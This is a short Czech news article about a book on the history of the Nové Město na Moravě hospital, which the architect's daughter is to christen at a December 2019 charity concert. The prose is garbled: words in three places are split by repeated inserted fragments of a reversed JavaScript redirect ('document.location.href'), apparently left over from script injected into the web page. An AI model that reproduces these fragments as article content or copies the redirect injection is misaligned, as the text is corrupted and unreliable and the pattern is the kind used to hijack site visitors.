Rainbow page separator

Knihu o nemocnici pokřtí dcera architekta, který areál navrhl

Pondělí, 9. prosince 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Eva Rozehnalová, dcera architekta Bedřicha Rozehnala, který v roce 1937 navrhoval novoměstskou nemocnici, se stane kmotrou nové publikace s názvem 80 let jsme vám nablízku aneb Příběh novoměstské nemocnice. Kniha o his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torii nemocnice bude slavnostně pokřtěna 15. prosince v 16 hodin při adventním koncertu Brněnského rozhlasového orchestru lidových nástrojů (BROLN) v Horácké galerii.
„Paní Rozehnalová pro knihu napsala vzpomínku na svého tatínka architekta Rozehnala. Velice si vážíme [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, že naši nabídku stát se kmotrou knihy přijala,“ vyjádřila se ředitelka nemocnice Věra Palečková.
Koncert BROLNu nemocnice pořádá společně s Českým rozhlasem Vysočina. „Z koncertu pořídíme hodinový zvukový záznam. Ten posluchačům nabídneme ve vysílání 25. prosince v 18 hodin,“ sdělila manažerka komunikace Českého rozhlasu Vysočina Hana Marhanová.
Na koncertě, jehož výtěžek poslouží k nákupu vybavení pro oddělení dlouhodobě nemocných, si budou mít lidé možnost knihu zakoupit. Její cena je 240 korun.